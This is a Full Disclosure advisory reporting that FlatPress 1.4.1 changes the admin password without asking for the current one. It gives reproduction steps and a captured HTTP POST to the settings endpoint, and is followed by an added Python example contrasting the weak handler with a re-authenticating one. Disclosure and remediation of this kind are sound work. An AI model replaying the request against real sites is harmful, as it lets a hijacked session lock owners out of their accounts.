
Full Disclosure mailing list archives
Current Password not Required When Changing Password - flatpressv1.4.1
From: Andrey Stoykov <mwebsec () gmail com>
Date: Sun, 21 Sep 2025 17:30:59 +0100
# Exploit Title: Current Password not Required When Changing Password - flatpressv1.4.1
# Date: 09/2025
# Exploit Author: Andrey Stoykov
# Version: 1.4.1
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/2025/09/friday-fun-pentest-series-42-current.html

Current Password not Required When Changing Password:

Steps to Reproduce:
- Log in with the admin user and visit "Main" > "Configuration" > "General Settings"
- The current password is not required when changing the password

// HTTP POST Request
POST /FlatPressc4hak4mvef/admin.php?p=config&action=default HTTP/1.1
Host: demos5.softaculous.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]

_wpnonce=c1d6797fb9&_wp_http_referer=%2FFlatPressc4hak4mvef%2Fadmin.php%3Fp%3Dconfig&admin=admin&password=&confirm_password=&title=FlatPress&subtitle=My+FlatPress+blog&blogfooter=&author=test&www=http%3A%2F%2Fdemos5.softaculous.com%2FFlatPressc4hak4mvef%2F&email=demos%40softaculous.com&notify=on&startpage=%3ANULL%3A&maxentries=5&timeoffset=0&dateformat=%25A%2C+%25B+%25e%2C+%25Y&dateformatshort=%25Y-%25m-%25d&timeformat=%25H%3A%25M%3A%25S&lang=en-us&charset=utf-8&save=Save+Changes

// HTTP Response
HTTP/1.1 200 OK
Date: Sun, 21 Sep 2025 15:14:16 GMT
Server: FlatPress
[...]

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
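The missing check, as an added example that is not FlatPress code: a Python model of an admin password-change handler in the weak form the advisory reports (the settings form's `password`/`confirm_password` fields are accepted on the strength of the CSRF nonce alone) beside a hardened form that requires a `current_password` field (an assumed name) to verify before the stored hash is replaced. The PBKDF2 scheme, the user record and the session nonce are constructed here for illustration.

```python
import hashlib
import hmac
import os


def hash_password(password: str, iterations: int = 200_000) -> str:
    """PBKDF2-SHA256 with a random salt (illustrative scheme, not FlatPress's own)."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def _nonce_ok(form: dict, session: dict) -> bool:
    # The captured request carries _wpnonce. A nonce stops cross-site forgery of the
    # form, but it does not prove that whoever holds the session knows the password.
    return hmac.compare_digest(form.get("_wpnonce", ""), session.get("nonce", "-"))


def change_password_weak(user: dict, form: dict, session: dict) -> str:
    """Behaviour the advisory reports: a new password is accepted without the current one."""
    if not _nonce_ok(form, session):
        return "rejected: bad nonce"
    new, confirm = form.get("password", ""), form.get("confirm_password", "")
    if new == "":
        return "unchanged"  # empty field, as in the captured request, keeps the old password
    if new != confirm:
        return "rejected: confirmation mismatch"
    user["hash"] = hash_password(new)
    return "changed"


def change_password_hardened(user: dict, form: dict, session: dict) -> str:
    """Same flow, but the (hypothetical) current_password field must verify first."""
    if not _nonce_ok(form, session):
        return "rejected: bad nonce"
    new, confirm = form.get("password", ""), form.get("confirm_password", "")
    if new == "":
        return "unchanged"
    if new != confirm:
        return "rejected: confirmation mismatch"
    # Re-authentication: a hijacked or shared admin session cannot lock the owner out.
    if not verify_password(form.get("current_password", ""), user["hash"]):
        return "rejected: current password required"
    user["hash"] = hash_password(new)
    return "changed"
```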